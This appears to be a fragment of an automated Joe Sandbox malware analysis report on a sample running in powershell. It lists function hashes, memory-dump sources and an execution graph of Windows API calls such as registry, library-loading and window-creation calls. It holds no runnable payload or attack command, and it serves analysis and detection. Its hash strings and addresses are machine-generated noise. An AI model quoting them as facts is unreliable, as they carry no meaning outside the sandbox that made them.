                                                                              • Opcode ID: 6054563177487b2cc8edf6a75c1df2fbd03b4d09e7981c0385d810ef3130dd1d
                                                                              • Instruction ID: 87da39b7d7fef9b1fba5523117931b718e77bb4854fb4f0ef721377d69f09510
                                                                              • Opcode Fuzzy Hash: 6054563177487b2cc8edf6a75c1df2fbd03b4d09e7981c0385d810ef3130dd1d
                                                                              • Instruction Fuzzy Hash: 56014472F0C6184FE6586A5C74022B973C1E7CA665F04023FE59FD33C1EE156853028A
                                                                              Function 00007FF848F063C7 Relevance: .1, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c7fe4367e00d4a9d87164c0b7862acee8fbb2f0bda6a0de93061d40be3a2ff92
                                                                              • Instruction ID: cd83be9009193768983ea337bd3a5e1cd78ffa0b24d64876d30ef7400a109c9a
                                                                              • Opcode Fuzzy Hash: c7fe4367e00d4a9d87164c0b7862acee8fbb2f0bda6a0de93061d40be3a2ff92
                                                                              • Instruction Fuzzy Hash: 85015276F0CA184FE658AA5C78061B973C1E7C9575F04023FE59FD3381EE25A81302CA
                                                                              Function 00007FF848F0A852 Relevance: .1, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a0a506e5376f41089fab43f55e04a381af42c27b22c333741143eb22a12ed73c
                                                                              • Instruction ID: 26fec339b2288ca225cf35ad46694c0437b30b11ae131e1e4ad450b3b4b96abb
                                                                              • Opcode Fuzzy Hash: a0a506e5376f41089fab43f55e04a381af42c27b22c333741143eb22a12ed73c
                                                                              • Instruction Fuzzy Hash: E621303050CA898FDB95EB28D454F617BE1FF56344F1944A9D04ECB2E3DA25EC82DB40
                                                                              Function 00007FF848F0A4C8 Relevance: .1, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ce81cc7035057dc2b753d83cb5d0e817c9c7203891926114b10a4a9103b3508e
                                                                              • Instruction ID: f92f28f2cede075df76829fbde097dde1cfdac03c14e29483d061a6c8e1ef558
                                                                              • Opcode Fuzzy Hash: ce81cc7035057dc2b753d83cb5d0e817c9c7203891926114b10a4a9103b3508e
                                                                              • Instruction Fuzzy Hash: 1C11E935B0CE050FDB98F72C545517577C1EB99294F04053FD44ED32D2EE69A8814345
                                                                              Function 00007FF848F0A348 Relevance: .1, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8e72919579044ca22f96399d1b5fd974a921c7a3f2f555a6615225b752b691e8
                                                                              • Instruction ID: aaebfc6d72acb70984aa86130791465fb572424f870eb11a82f57f5d9f327a46
                                                                              • Opcode Fuzzy Hash: 8e72919579044ca22f96399d1b5fd974a921c7a3f2f555a6615225b752b691e8
                                                                              • Instruction Fuzzy Hash: 9E118C32A4C9894FD721BB249C518E67BE5EF86350F0401AAD04DC71D2EA6EA886C345
                                                                              Function 00007FF848F03975 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                              • Instruction ID: 650e55435db4c428520be756852e448c507beb6490eab5e5db5e4b15553b9e06
                                                                              • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                              • Instruction Fuzzy Hash: DC01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                                                              Function 00007FF848F0A30B Relevance: .0, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dbc04e7ad051664b5e2d317eefb4ec48b2900080cb86f3a310767513e8b84629
                                                                              • Instruction ID: 61ce78adbf51039a491df802d437227b5c897ed65b282cdbd1e6872debd588a8
                                                                              • Opcode Fuzzy Hash: dbc04e7ad051664b5e2d317eefb4ec48b2900080cb86f3a310767513e8b84629
                                                                              • Instruction Fuzzy Hash: FCF0C233E4C94D8EEB10A669BC119E87BD5EF8A368F090079E40CC31D1E76B5881C255

                                                                              Non-executed Functions

                                                                              Function 00007FF848F089FA Relevance: 7.6, Strings: 6, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2323426207.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7ff848f00000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: O_^8$O_^I$O_^J$O_^K$O_^N$O_^Y
                                                                              • API String ID: 0-1866808879
                                                                              • Opcode ID: eb6428380b1fca2602e853d65f5f6c062327f1a6b3cd520b12bbd4032938ed34
                                                                              • Instruction ID: a19ce53fe14e8962c5df3b9a14c3d46841fc41e242b24f21d5f5bd71ed926bc8
                                                                              • Opcode Fuzzy Hash: eb6428380b1fca2602e853d65f5f6c062327f1a6b3cd520b12bbd4032938ed34
                                                                              • Instruction Fuzzy Hash: F521387762A01296D10237AD7C021DAB795FF943BAB5802F6D25ECE203DE2D64C786D8

                                                                              Execution Graph

                                                                              Execution Coverage:6.3%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:15.9%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:80
                                                                              execution_graph 82546 11106e70 GetTickCount EnterCriticalSection GetTickCount 82547 11106ec3 82546->82547 82548 11106eb8 82546->82548 82550 11106ee2 82547->82550 82551 11106f3a GetTickCount LeaveCriticalSection 82547->82551 82592 11147060 82548->82592 82552 11106f00 GetTickCount LeaveCriticalSection 82550->82552 82598 11029a70 265 API calls 2 library calls 82550->82598 82553 11106f60 EnterCriticalSection 82551->82553 82554 11106f52 82551->82554 82557 11106f23 82552->82557 82558 11106f18 82552->82558 82555 11106f89 82553->82555 82559 11147060 std::_Mutex::_Mutex 21 API calls 82554->82559 82563 11106f93 82555->82563 82564 11106fb4 82555->82564 82562 11147060 std::_Mutex::_Mutex 21 API calls 82558->82562 82560 11106f5d 82559->82560 82560->82553 82562->82557 82565 1110702e LeaveCriticalSection 82563->82565 82566 11106f9e 82563->82566 82583 111101b0 82564->82583 82599 11029a70 265 API calls 2 library calls 82566->82599 82571 11106fd7 82574 11106fe4 82571->82574 82575 11106ffb 82571->82575 82572 1110702b 82572->82565 82601 11029a70 265 API calls 2 library calls 82574->82601 82602 1108a2e0 266 API calls 3 library calls 82575->82602 82579 11107010 82603 11149b20 67 API calls std::ios_base::_Ios_base_dtor 82579->82603 82581 1110701f 82582 11147060 std::_Mutex::_Mutex 21 API calls 82581->82582 82582->82572 82604 11163a11 82583->82604 82586 11110203 _memset 82621 11162bb7 82586->82621 82587 111101d7 wsprintfA 82629 11029a70 265 API calls 2 library calls 82587->82629 82591 11106fbe 82591->82571 82600 110f1080 InitializeCriticalSection InterlockedIncrement InterlockedIncrement CreateEventA 82591->82600 82593 11147071 82592->82593 82594 1114706c 82592->82594 82639 111464c0 82593->82639 82642 11146270 18 API calls std::_Mutex::_Mutex 82594->82642 82600->82571 82602->82579 82603->82581 82605 11163a8e 82604->82605 82618 11163a1f 82604->82618 82636 1116e368 DecodePointer 82605->82636 82607 11163a94 82637 1116a1af 66 API calls __getptd_noexit 82607->82637 82610 11163a4d RtlAllocateHeap 82610->82618 82620 111101ce 82610->82620 82612 11163a7a 82634 1116a1af 66 API calls __getptd_noexit 82612->82634 82616 11163a78 82635 1116a1af 66 API calls __getptd_noexit 82616->82635 82617 11163a2a 82617->82618 82630 1116e85d 66 API calls 2 library calls 82617->82630 82631 1116e6ae 66 API calls 7 library calls 82617->82631 82632 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 82617->82632 82618->82610 82618->82612 82618->82616 82618->82617 82633 1116e368 DecodePointer 82618->82633 82620->82586 82620->82587 82622 11162bc1 IsDebuggerPresent 82621->82622 82623 11162bbf 82621->82623 82638 111784f7 82622->82638 82623->82591 82626 1116cb59 SetUnhandledExceptionFilter UnhandledExceptionFilter 82627 1116cb76 __call_reportfault 82626->82627 82628 1116cb7e GetCurrentProcess TerminateProcess 82626->82628 82627->82628 82628->82591 82630->82617 82631->82617 82633->82618 82634->82616 82635->82620 82636->82607 82637->82620 82638->82626 82643 11146370 82639->82643 82641 111464d2 82641->82547 82642->82593 82644 11146394 82643->82644 82645 11146399 82643->82645 82663 11146270 18 API calls std::_Mutex::_Mutex 82644->82663 82647 11146402 82645->82647 82648 111463a2 82645->82648 82649 111464ae 82647->82649 82650 1114640f wsprintfA 82647->82650 82651 111463d9 82648->82651 82654 111463b0 82648->82654 82652 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 82649->82652 82653 11146432 82650->82653 82657 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 82651->82657 82655 111464ba 82652->82655 82653->82653 82656 11146439 wvsprintfA 82653->82656 82659 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 82654->82659 82655->82641 82662 11146454 82656->82662 82658 111463fe 82657->82658 82658->82641 82660 111463d5 82659->82660 82660->82641 82661 111464a1 OutputDebugStringA 82661->82649 82662->82661 82662->82662 82663->82645 82664 110179e0 GetTickCount 82671 110178f0 82664->82671 82669 11147060 std::_Mutex::_Mutex 21 API calls 82670 11017a27 82669->82670 82672 11017910 82671->82672 82679 110179c6 82671->82679 82673 11017932 CoInitialize _GetRawWMIStringW 82672->82673 82675 11017929 WaitForSingleObject 82672->82675 82676 110179b2 82673->82676 82683 11017965 82673->82683 82674 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 82677 110179d5 82674->82677 82675->82673 82678 110179c0 CoUninitialize 82676->82678 82676->82679 82684 11017810 82677->82684 82678->82679 82679->82674 82680 110179ac 82702 111646f7 67 API calls __fassign 82680->82702 82683->82676 82683->82680 82697 111648ed 82683->82697 82685 11017830 82684->82685 82691 110178d6 82684->82691 82686 11017848 CoInitialize _GetRawWMIStringW 82685->82686 82689 1101783f WaitForSingleObject 82685->82689 82692 110178c2 82686->82692 82696 1101787b 82686->82696 82687 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 82688 110178e5 SetEvent GetTickCount 82687->82688 82688->82669 82689->82686 82690 110178d0 CoUninitialize 82690->82691 82691->82687 82692->82690 82692->82691 82693 110178bc 82704 111646f7 67 API calls __fassign 82693->82704 82695 111648ed std::_Mutex::_Mutex 79 API calls 82695->82696 82696->82692 82696->82693 82696->82695 82698 1116490d 82697->82698 82699 111648fb 82697->82699 82703 1116489c 79 API calls 2 library calls 82698->82703 82699->82683 82701 11164917 82701->82683 82702->82676 82703->82701 82704->82692 82705 110262c0 LoadLibraryA 82706 11031780 82707 1103178e 82706->82707 82711 11146a90 82707->82711 82710 110317af std::_Mutex::_Mutex 82714 11145be0 82711->82714 82715 11145bf0 82714->82715 82715->82715 82720 11110230 82715->82720 82717 11145c02 82727 11145b10 82717->82727 82719 1103179f SetUnhandledExceptionFilter 82719->82710 82721 11163a11 _malloc 66 API calls 82720->82721 82722 1111023e 82721->82722 82723 11110247 82722->82723 82725 1111025e _memset 82722->82725 82738 11029a70 265 API calls 2 library calls 82723->82738 82725->82717 82728 11145b27 _strncpy 82727->82728 82729 11145b62 __crtCompareStringA_stat 82727->82729 82728->82728 82730 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 82728->82730 82739 11143300 MultiByteToWideChar 82729->82739 82732 11145b5e 82730->82732 82732->82719 82733 11145b94 82740 11143340 WideCharToMultiByte GetLastError 82733->82740 82735 11145ba6 82736 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 82735->82736 82737 11145bb9 82736->82737 82737->82719 82739->82733 82740->82735 82741 11041180 82742 110411b2 82741->82742 82743 110411b8 82742->82743 82748 110411d4 82742->82748 82744 110fb470 15 API calls 82743->82744 82746 110411ca CloseHandle 82744->82746 82745 110412e8 82747 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 82745->82747 82746->82748 82750 110412f5 82747->82750 82748->82745 82752 1104120d 82748->82752 82773 110881d0 297 API calls 5 library calls 82748->82773 82749 11041268 82763 110fb470 GetTokenInformation 82749->82763 82752->82745 82752->82749 82754 1104127a 82755 11041282 CloseHandle 82754->82755 82758 11041289 82754->82758 82755->82758 82756 110412cb 82759 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 82756->82759 82757 110412b1 82760 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 82757->82760 82758->82756 82758->82757 82761 110412e4 82759->82761 82762 110412c7 82760->82762 82764 110fb4b8 82763->82764 82765 110fb4a7 82763->82765 82774 110f2300 9 API calls 82764->82774 82766 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 82765->82766 82768 110fb4b4 82766->82768 82768->82754 82769 110fb4dc 82769->82765 82770 110fb4e4 82769->82770 82771 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 82770->82771 82772 110fb50a 82771->82772 82772->82754 82773->82752 82774->82769 82775 11144dd0 82776 11144de1 82775->82776 82789 111447f0 82776->82789 82780 11144e65 82783 11144e82 82780->82783 82785 11144e64 82780->82785 82781 11144e2b 82782 11144e32 ResetEvent 82781->82782 82797 111449b0 265 API calls 2 library calls 82782->82797 82785->82780 82798 111449b0 265 API calls 2 library calls 82785->82798 82786 11144e46 SetEvent WaitForMultipleObjects 82786->82782 82786->82785 82788 11144e7f 82788->82783 82790 111447fc GetCurrentProcess 82789->82790 82791 1114481f 82789->82791 82790->82791 82792 1114480d GetModuleFileNameA 82790->82792 82793 11144849 WaitForMultipleObjects 82791->82793 82794 111101b0 std::_Mutex::_Mutex 263 API calls 82791->82794 82792->82791 82793->82780 82793->82781 82795 1114483b 82794->82795 82795->82793 82799 11144140 GetModuleFileNameA 82795->82799 82797->82786 82798->82788 82800 11144183 82799->82800 82802 111441c3 82799->82802 82813 11081e00 82800->82813 82803 111441cf LoadLibraryA 82802->82803 82804 111441e9 GetModuleHandleA GetProcAddress 82802->82804 82803->82804 82806 111441de LoadLibraryA 82803->82806 82807 11144217 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 82804->82807 82808 11144209 82804->82808 82805 11144191 82805->82802 82809 11144198 LoadLibraryA 82805->82809 82806->82804 82810 11144243 10 API calls 82807->82810 82808->82810 82809->82802 82811 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 82810->82811 82812 111442c0 82811->82812 82812->82793 82815 11081e13 _strrchr 82813->82815 82814 11081e2a std::_Mutex::_Mutex 82814->82805 82815->82814 82817 11081c50 IsDBCSLeadByte 82815->82817 82817->82814 82818 6eef63a0 82819 6eef63a5 82818->82819 82820 6eef63a9 WSACancelBlockingCall 82819->82820 82821 6eef63b1 Sleep 82819->82821 82822 11174898 82845 1116c675 82822->82845 82824 111748b5 _LcidFromHexString 82825 111748c2 GetLocaleInfoA 82824->82825 82826 111748f5 82825->82826 82834 111748e9 82825->82834 82850 1116558e 85 API calls 2 library calls 82826->82850 82828 11174901 82830 1117490b GetLocaleInfoA 82828->82830 82842 1117493b _LangCountryEnumProc@4 _strlen 82828->82842 82829 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 82831 11174a65 82829->82831 82832 1117492a 82830->82832 82830->82834 82851 1116558e 85 API calls 2 library calls 82832->82851 82833 111749ae GetLocaleInfoA 82833->82834 82836 111749d1 82833->82836 82834->82829 82853 1116558e 85 API calls 2 library calls 82836->82853 82838 11174935 82838->82842 82852 11164644 85 API calls 2 library calls 82838->82852 82839 111749dc 82839->82834 82843 111749e4 _strlen 82839->82843 82854 1116558e 85 API calls 2 library calls 82839->82854 82842->82833 82842->82834 82843->82834 82855 1117483d GetLocaleInfoW _GetPrimaryLen _strlen 82843->82855 82856 1116c5fc GetLastError 82845->82856 82847 1116c67d 82848 1116c68a 82847->82848 82870 1116e66a 66 API calls 3 library calls 82847->82870 82848->82824 82850->82828 82851->82838 82852->82842 82853->82839 82854->82843 82855->82834 82871 1116c4ba TlsGetValue 82856->82871 82859 1116c669 SetLastError 82859->82847 82862 1116c62f DecodePointer 82863 1116c644 82862->82863 82864 1116c660 82863->82864 82865 1116c648 82863->82865 82881 11163aa5 82864->82881 82880 1116c548 66 API calls 4 library calls 82865->82880 82868 1116c650 GetCurrentThreadId 82868->82859 82869 1116c666 82869->82859 82872 1116c4cf DecodePointer TlsSetValue 82871->82872 82873 1116c4ea 82871->82873 82872->82873 82873->82859 82874 1116ac7e 82873->82874 82876 1116ac87 82874->82876 82877 1116acc4 82876->82877 82878 1116aca5 Sleep 82876->82878 82887 11170fc4 82876->82887 82877->82859 82877->82862 82879 1116acba 82878->82879 82879->82876 82879->82877 82880->82868 82882 11163ab0 HeapFree 82881->82882 82883 11163ad9 __dosmaperr 82881->82883 82882->82883 82884 11163ac5 82882->82884 82883->82869 82898 1116a1af 66 API calls __getptd_noexit 82884->82898 82886 11163acb GetLastError 82886->82883 82888 11170fd0 82887->82888 82895 11170feb 82887->82895 82889 11170fdc 82888->82889 82888->82895 82896 1116a1af 66 API calls __getptd_noexit 82889->82896 82890 11170ffe RtlAllocateHeap 82892 11171025 82890->82892 82890->82895 82892->82876 82893 11170fe1 82893->82876 82895->82890 82895->82892 82897 1116e368 DecodePointer 82895->82897 82896->82893 82897->82895 82898->82886 82899 11030ef3 RegOpenKeyExA 82900 11030f20 82899->82900 82901 1103103d 82899->82901 82983 11143bd0 RegQueryValueExA 82900->82983 82904 11031061 82901->82904 82906 11031145 82901->82906 82908 111101b0 std::_Mutex::_Mutex 265 API calls 82904->82908 82905 11031030 RegCloseKey 82905->82901 82909 111101b0 std::_Mutex::_Mutex 265 API calls 82906->82909 82916 11031088 82908->82916 82911 1103114c 82909->82911 83134 110fae60 272 API calls std::_Mutex::_Mutex 82911->83134 82912 111648ed std::_Mutex::_Mutex 79 API calls 82914 11030f6d 82912->82914 82915 11030f86 82914->82915 82918 111648ed std::_Mutex::_Mutex 79 API calls 82914->82918 82919 11163ca7 std::_Mutex::_Mutex 79 API calls 82915->82919 82917 110312db GetStockObject GetObjectA 82916->82917 82920 1103130a SetErrorMode SetErrorMode 82917->82920 82918->82914 82924 11030f92 82919->82924 82922 111101b0 std::_Mutex::_Mutex 265 API calls 82920->82922 82923 11031346 82922->82923 82989 11028980 82923->82989 82924->82905 82925 11143bd0 std::_Mutex::_Mutex RegQueryValueExA 82924->82925 82928 11030fe8 82925->82928 82927 11031360 82930 111101b0 std::_Mutex::_Mutex 265 API calls 82927->82930 82929 11143bd0 std::_Mutex::_Mutex RegQueryValueExA 82928->82929 82931 11031011 82929->82931 82932 11031386 82930->82932 82931->82905 82933 11028980 268 API calls 82932->82933 82934 1103139f InterlockedExchange 82933->82934 82936 111101b0 std::_Mutex::_Mutex 265 API calls 82934->82936 82937 110313c7 82936->82937 82992 1108a880 82937->82992 82939 110313df GetACP 83003 11163f93 82939->83003 82944 11031410 83050 11143780 82944->83050 82947 111101b0 std::_Mutex::_Mutex 265 API calls 82948 1103145c 82947->82948 83056 11061aa0 82948->83056 82951 110314d4 83075 110ccc90 82951->83075 82952 111101b0 std::_Mutex::_Mutex 265 API calls 82954 110314ae 82952->82954 83135 11061710 82954->83135 82956 111101b0 std::_Mutex::_Mutex 265 API calls 82957 11031501 82956->82957 83082 11125d40 82957->83082 82984 11030f4a 82983->82984 82984->82905 82985 11163ca7 82984->82985 82986 11163c91 82985->82986 83148 1116450b 82986->83148 82990 11088b30 268 API calls 82989->82990 82991 1102898b _memset 82990->82991 82991->82927 82993 111101b0 std::_Mutex::_Mutex 265 API calls 82992->82993 82994 1108a8b7 82993->82994 82995 1108a8d9 InitializeCriticalSection 82994->82995 82996 111101b0 std::_Mutex::_Mutex 265 API calls 82994->82996 82999 1108a93a 82995->82999 82998 1108a8d2 82996->82998 82998->82995 83242 1116305a 66 API calls std::exception::_Copy_str 82998->83242 82999->82939 83001 1108a909 83243 111634b1 RaiseException 83001->83243 83004 11163fc6 83003->83004 83005 11163fb1 83003->83005 83004->83005 83007 11163fcd 83004->83007 83266 1116a1af 66 API calls __getptd_noexit 83005->83266 83244 1117027b 102 API calls 10 library calls 83007->83244 83008 11163fb6 83267 1116edc4 11 API calls _sprintf 83008->83267 83011 11163ff3 83012 11031406 83011->83012 83245 111700e4 83011->83245 83014 111663a3 83012->83014 83015 111663af __close 83014->83015 83016 111663d0 83015->83016 83017 111663b9 83015->83017 83019 1116c675 __getptd 66 API calls 83016->83019 83311 1116a1af 66 API calls __getptd_noexit 83017->83311 83021 111663d5 83019->83021 83020 111663be 83312 1116edc4 11 API calls _sprintf 83020->83312 83023 11171306 _setlocale 74 API calls 83021->83023 83024 111663df 83023->83024 83025 1116ac7e __calloc_crt 66 API calls 83024->83025 83026 111663f5 83025->83026 83027 111663c9 __close _setlocale 83026->83027 83028 1117459f __lock 66 API calls 83026->83028 83027->82944 83029 1116640b 83028->83029 83286 11165814 83029->83286 83036 111664ec 83317 111710d5 8 API calls 83036->83317 83037 1116643b _setlocale 83040 1117459f __lock 66 API calls 83037->83040 83039 111664f2 83318 1117116e 66 API calls 4 library calls 83039->83318 83041 11166461 83040->83041 83313 111712b9 74 API calls 3 library calls 83041->83313 83044 11166473 83314 111710d5 8 API calls 83044->83314 83046 11166479 83047 11166497 83046->83047 83315 111712b9 74 API calls 3 library calls 83046->83315 83316 111664e1 LeaveCriticalSection _doexit 83047->83316 83470 11143690 83050->83470 83052 11166654 85 API calls std::_Mutex::_Mutex 83054 11143795 83052->83054 83053 11143690 IsDBCSLeadByte 83053->83054 83054->83052 83054->83053 83055 1103143c 83054->83055 83055->82947 83057 11061710 293 API calls 83056->83057 83058 11061ade 83057->83058 83059 111101b0 std::_Mutex::_Mutex 265 API calls 83058->83059 83060 11061b0b 83059->83060 83061 11061b24 83060->83061 83062 11061710 293 API calls 83060->83062 83063 111101b0 std::_Mutex::_Mutex 265 API calls 83061->83063 83062->83061 83064 11061b35 83063->83064 83065 11061710 293 API calls 83064->83065 83067 11061b4e 83064->83067 83065->83067 83066 11031487 83066->82951 83066->82952 83067->83066 83482 11142e60 83067->83482 83069 11061b76 83491 11061a70 83069->83491 83076 110ccc99 83075->83076 83077 110314fa 83075->83077 83610 11145410 GetSystemMetrics GetSystemMetrics 83076->83610 83077->82956 83079 110ccca0 std::_Mutex::_Mutex 83079->83077 83080 110cccae CreateWindowExA 83079->83080 83080->83077 83081 110cccd8 SetClassLongA 83080->83081 83081->83077 83083 111101b0 std::_Mutex::_Mutex 265 API calls 83082->83083 83084 11125d74 83083->83084 83085 11125da5 83084->83085 83086 11125d8a 83084->83086 83611 11124f70 83085->83611 83657 110765c0 467 API calls std::_Mutex::_Mutex 83086->83657 83088 11125d9a 83088->83085 83134->82916 83136 111101b0 std::_Mutex::_Mutex 265 API calls 83135->83136 83137 11061761 83136->83137 83138 11061777 InitializeCriticalSection 83137->83138 84771 11061210 266 API calls 3 library calls 83137->84771 83141 110617b7 83138->83141 83146 11061826 83138->83146 84772 1105f830 287 API calls 3 library calls 83141->84772 83143 110617d8 RegCreateKeyExA 83144 11061832 RegCreateKeyExA 83143->83144 83145 110617ff RegCreateKeyExA 83143->83145 83144->83146 83147 11061865 RegCreateKeyExA 83144->83147 83145->83144 83145->83146 83146->82951 83147->83146 83149 11164524 83148->83149 83152 111642e0 83149->83152 83164 11164259 83152->83164 83154 11164304 83172 1116a1af 66 API calls __getptd_noexit 83154->83172 83157 11164309 83173 1116edc4 11 API calls _sprintf 83157->83173 83160 1116433a 83161 11164381 83160->83161 83174 11171a63 79 API calls 3 library calls 83160->83174 83163 11030f5e 83161->83163 83175 1116a1af 66 API calls __getptd_noexit 83161->83175 83163->82912 83165 1116426c 83164->83165 83169 111642b9 83164->83169 83166 1116c675 __getptd 66 API calls 83165->83166 83167 11164271 83166->83167 83168 11164299 83167->83168 83176 11171306 83167->83176 83168->83169 83191 111715a2 68 API calls 6 library calls 83168->83191 83169->83154 83169->83160 83172->83157 83173->83163 83174->83160 83175->83163 83177 11171312 __close 83176->83177 83178 1116c675 __getptd 66 API calls 83177->83178 83179 11171317 83178->83179 83180 11171345 83179->83180 83182 11171329 83179->83182 83193 1117459f 83180->83193 83184 1116c675 __getptd 66 API calls 83182->83184 83183 1117134c 83200 111712b9 74 API calls 3 library calls 83183->83200 83186 1117132e 83184->83186 83190 1117133c __close 83186->83190 83192 1116e66a 66 API calls 3 library calls 83186->83192 83187 11171360 83201 11171373 LeaveCriticalSection _doexit 83187->83201 83190->83168 83191->83169 83194 111745c7 EnterCriticalSection 83193->83194 83195 111745b4 83193->83195 83194->83183 83202 111744dd 83195->83202 83197 111745ba 83197->83194 83229 1116e66a 66 API calls 3 library calls 83197->83229 83200->83187 83201->83186 83203 111744e9 __close 83202->83203 83204 11174511 83203->83204 83205 111744f9 83203->83205 83211 1117451f __close 83204->83211 83233 1116ac39 83204->83233 83230 1116e85d 66 API calls 2 library calls 83205->83230 83207 111744fe 83231 1116e6ae 66 API calls 7 library calls 83207->83231 83211->83197 83212 11174505 83232 1116e3ed GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 83212->83232 83213 11174531 83239 1116a1af 66 API calls __getptd_noexit 83213->83239 83214 11174540 83215 1117459f __lock 65 API calls 83214->83215 83218 11174547 83215->83218 83220 1117454f InitializeCriticalSectionAndSpinCount 83218->83220 83221 1117457a 83218->83221 83222 1117456b 83220->83222 83223 1117455f 83220->83223 83224 11163aa5 _free 65 API calls 83221->83224 83241 11174596 LeaveCriticalSection _doexit 83222->83241 83225 11163aa5 _free 65 API calls 83223->83225 83224->83222 83226 11174565 83225->83226 83240 1116a1af 66 API calls __getptd_noexit 83226->83240 83230->83207 83231->83212 83234 1116ac42 83233->83234 83235 11163a11 _malloc 65 API calls 83234->83235 83236 1116ac78 83234->83236 83237 1116ac59 Sleep 83234->83237 83235->83234 83236->83213 83236->83214 83238 1116ac6e 83237->83238 83238->83234 83238->83236 83239->83211 83240->83222 83241->83211 83242->83001 83243->82995 83244->83011 83268 1116a147 83245->83268 83247 111700f4 83248 11170116 83247->83248 83249 111700ff 83247->83249 83251 1117011a 83248->83251 83259 11170127 __stbuf 83248->83259 83278 1116a1af 66 API calls __getptd_noexit 83249->83278 83279 1116a1af 66 API calls __getptd_noexit 83251->83279 83253 11170188 83254 11170217 83253->83254 83255 11170197 83253->83255 83283 111730a4 97 API calls 6 library calls 83254->83283 83257 111701ae 83255->83257 83262 111701cb 83255->83262 83281 111730a4 97 API calls 6 library calls 83257->83281 83259->83253 83261 11170104 83259->83261 83263 1117017d 83259->83263 83280 111799f8 66 API calls _sprintf 83259->83280 83261->83012 83262->83261 83282 1117650e 71 API calls 6 library calls 83262->83282 83263->83253 83275 11177ff0 83263->83275 83266->83008 83267->83012 83269 1116a153 83268->83269 83270 1116a168 83268->83270 83284 1116a1af 66 API calls __getptd_noexit 83269->83284 83270->83247 83272 1116a158 83285 1116edc4 11 API calls _sprintf 83272->83285 83274 1116a163 83274->83247 83276 1116ac39 